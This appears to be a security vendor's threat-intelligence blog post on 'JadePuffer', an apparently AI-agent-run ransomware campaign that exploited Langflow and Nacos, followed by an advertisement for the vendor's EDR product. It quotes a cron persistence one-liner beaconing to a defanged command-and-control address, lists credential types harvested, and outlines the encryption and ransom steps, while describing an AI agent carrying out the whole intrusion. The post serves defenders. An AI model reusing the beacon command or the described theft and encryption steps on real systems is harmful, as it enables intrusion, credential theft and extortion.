
The attack campaign known as JadePuffer is the first ransomware campaign ever to be operated completely autonomously through AI. There were no humans typing any commands while the attack was ongoing. There were no humans making adjustments based on what was happening during the course of the attack either. All of these tasks were done by a large language model.
That’s important because it alters the cost-benefit analysis for ransomware. The skill set requirement goes down. Speed is upped. And a rational adversary has been introduced.
What Made JadePuffer Different From Typical Ransomware
Most ransomwares follow a well-defined script. The attack is initiated by a human attacker who selects the target, launches an exploit he knows, and decides on how to react to any possible errors.
In the case of JadePuffer, the AI-driven agent performed differently. It:
- Selected its actions in real-time depending on the feedback from the targeted machine
- Changed the strategy in case of failure, not repeating the previous command again
- Adjusted parsing logic when a server returned unexpected data formats
- Completed a transition from the error to successful operation in about 31 seconds
The latter fact deserves to be highlighted. Transitioning from error to a successful action in 31 seconds means that some form of reasoning was involved, not just trial-and-error method.
Breaking Down The Attack Chain Step By Step
This intrusion commenced via the exploitation of CVE-2025-3248, which was an unauthenticated remote code execution vulnerability in Langflow. Langflow is an open-source framework for creating LLM-based application. This is somewhat ironic as an AI-based framework was used to facilitate an AI-powered attack.
CVE-2025-3248 had been patched by April of 2025. The CISA had already identified its exploitation by May of that year. Still, vulnerable Langflow installations were regularly being found online, many without proper hardening and even with live cloud credentials available within the same environment.
Once the agent was able to gain access, it quickly:
- Dumped the Langflow PostgreSQL database;
- Collected host information, environment variables and other files;
- Extracted credentials;
- Enumerated MinIO object storage connected to it.
MinIO exploitation is especially illustrative of the agent’s flexibility. Once an API request returned XML instead of JSON, the next payload changed its parsing strategy. This may not sound like much on the technical side of things, but shows an ability to process non-standard responses nonetheless.
Persistence, Pivoting, And Privilege Escalation
Once established, the agent proceeded to expand their control outside of data exfiltration by adding a cron job to the affected Langflow host to signal the attacker’s infrastructure every 30 minutes typical persistence without manual intervention.
The agent went on to target a production MySQL server that was named and configured using Alibaba Nacos with authentication performed using root credentials of unknown provenance.
Exploitation techniques were used, specifically the CVE-2021-29441 which was used to create unauthorized administrator accounts for access to configuration information.
Of particular interest is the fact that the AI also tried container escape techniques prior to executing ransomware code.
Inside The Encryption And Extortion Mechanics
In Nacos, the agent proceeded by encrypting 1,342 service config entries using MySQL AES_ENCRYPT() and removing both the original config and history tables.
After that, it created a ransom table called README_RANSOM which contained:
- Ransom message
- Bitcoin address
- Proton Mail contact for ransom negotiations
The ransom note mentions AES-256; however, technical analysis shows that AES-128-ECB encryption algorithm is most likely used here, which demonstrates a discrepancy between the ransom note and technical facts.
Moreover, the decryption key was randomly generated and neither saved nor sent anywhere, thus there is little chance of being able to decrypt the information by the attacker themselves.
Technical Indicators Defenders Should Know
Beyond the narrative, JadePuffer left behind a specific and traceable footprint. Here’s the core technical data tied to the campaign:
- Entry vulnerability: CVE-2025-3248, a missing-authentication flaw in Langflow’s code validation endpoint, rated 9.8 (Critical) under CVSS 3.1
- Patch status: Fixed in Langflow 1.3.0 on April 1, 2025; added to CISA’s Known Exploited Vulnerabilities catalog in May 2025
- Privilege escalation flaw: CVE-2021-29441, a Nacos authentication bypass used to create rogue administrator accounts
- Command-and-control IP:
45.131.66[.]106, reached over port4444 - Persistence mechanism: A crontab entry beaconing every 30 minutes via a Python one-liner:
*/30 * * * * python3 -c "import urllib.request;urllib.request.urlopen('hxxp://45.131.66[.]106:4444/beacon',timeout=5)" - Claimed staging server:
64.20.53[.]230, referenced only in a payload comment, with no confirmed data transfer to that address - Ransom Bitcoin address:
3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy - Ransom contact:
e78393397[@]proton[.]me - Extortion artifact: A database table named
README_RANSOM, dropped directly into the compromised Nacos MySQL instance
Notably, the ransom email format doesn’t match patterns seen in established extortion campaigns. Established operators tend to reuse descriptive, recognizable handles across many victims. This address, by contrast, follows a generic lowercase-letter-plus-eight-digit structure with no prior appearances in abuse databases or victim reports.
Credential Harvesting Went Well Beyond The Basics
The following credentials were targeted by the agent selectively:
- Keys for provider APIs for generating LLMs: OpenAI, Anthropic, DeepSeek, Gemini
- Credentials for cloud services: prefixes for Chinese companies (ALIBABA_, ALIYUN_, TENCENT_, HUAWEI_) and AWS, GCP, Azure
- Cryptocurrency wallet keys and seed phrases
- Credentials for database logins and connection strings
- Configuration files containing environment variables
The selection of prefixes for Chinese cloud service providers is a minor detail but it speaks volumes about how the model was adjusted to target a certain niche infrastructure.
The Encryption Key Nobody Could Use
The cryptographic side of the payload deserves its own look, since it undercuts the ransom demand entirely. The agent generated its AES key using a straightforward method: concatenating two UUID4 byte sequences and encoding the result in base64.
That process produces a high-entropy, cryptographically reasonable key. However, the payload only printed that key to standard output during execution. It never wrote the key to persistent storage, and it never transmitted it to any external server.
Practically, this means the decryption key existed only for the duration of a terminal session. Once that session closed, recovery became mathematically impossible, even for a victim willing to pay. That’s a significant gap between the ransom note’s promise and the payload’s actual behavior.
Why This Signals A New Category Of Cyber Threat
Historically, running a multi-stage intrusion required chaining together exploitation knowledge, database internals, cloud storage APIs, and encryption implementation. JadePuffer suggests a single capable AI agent can now stand in for that entire skill set.
At the same time, this shift cuts both ways. LLM-generated payloads tend to carry distinctive fingerprints: verbose comments, predictable coding patterns, and occasionally reproduced training artifacts like that recycled Bitcoin address. These traits create detection opportunities that human-authored malware, refined over years to minimize footprint, typically avoids.
The broader implication is clear. As agentic AI tools become more capable and more accessible, the pool of people able to launch sophisticated attacks grows too. Meanwhile, security teams will need to start treating AI-authored code as its own distinct category, with its own behavioral signatures worth tracking.
Conclusion: When an AI Agent Becomes the Ransomware Operator
JadePuffer shows what ransomware looks like when the operator is no longer human. The attack chain did not depend on someone manually choosing each command, fixing each error, or adapting each step in real time. An AI agent exploited Langflow, harvested credentials, pivoted into connected systems, created persistence, abused Nacos access, encrypted configuration data, and dropped a ransom table on its own.
That changes the ransomware model.
The attacker no longer needs a large team to run a multi-stage intrusion. The agent can reason, retry, adapt, and move faster than traditional response cycles were designed to handle.
Why This Threat Matters
JadePuffer is dangerous because it combines three risks defenders already struggle with, exposed AI infrastructure, credential-rich environments, and ransomware automation.
- Langflow RCE gave the agent unauthenticated entry
- Environment variables and databases exposed credentials
- MinIO storage enumeration expanded the target surface
- Cron persistence allowed hands-off access
- Nacos abuse created unauthorized administrator control
- Ransomware logic encrypted 1,342 configuration entries
- The lost decryption key made recovery impossible, even if payment was made
This is not only ransomware. It is autonomous attack execution.
Where Xcitium Changes the Outcome
This attack must be stopped before exposed AI systems remain vulnerable and before autonomous execution turns access into damage.
Xcitium Vulnerability Assessment helps organizations identify exposed Langflow deployments, vulnerable services, weak configurations, and patch gaps before attackers turn AI infrastructure into an entry point.
But once an autonomous agent begins running tools, scripts, commands, payloads, persistence logic, or encryption activity, the decisive control is runtime governance.
Xcitium Advanced EDR, powered by Xcitium’s patented Zero-Dwell platform, applies Execution Governance.
Unknown code does not receive unrestricted execution rights.
Code can run without being able to cause damage.
Runtime behavior is governed before trust exists.
Persistence, credential theft, lateral movement, C2 activity, and ransomware execution are stopped before impact.
Detection asks, “Did we recognize this as malicious?”
Execution Governance asks, “Could autonomous execution cause damage at all?”
That is the difference.
Xcitium = No Ransomware
JadePuffer is a warning that ransomware is becoming faster, more autonomous, and less dependent on skilled human operators. The next attacker may not need to sit at a keyboard. The AI agent can do the work.
Security teams cannot depend on perfect detection after execution begins.
They need control before trust.
They need proof before impact.
Find exposed AI infrastructure.
Govern unknown execution before it becomes damage.
Stop ransomware before encryption begins.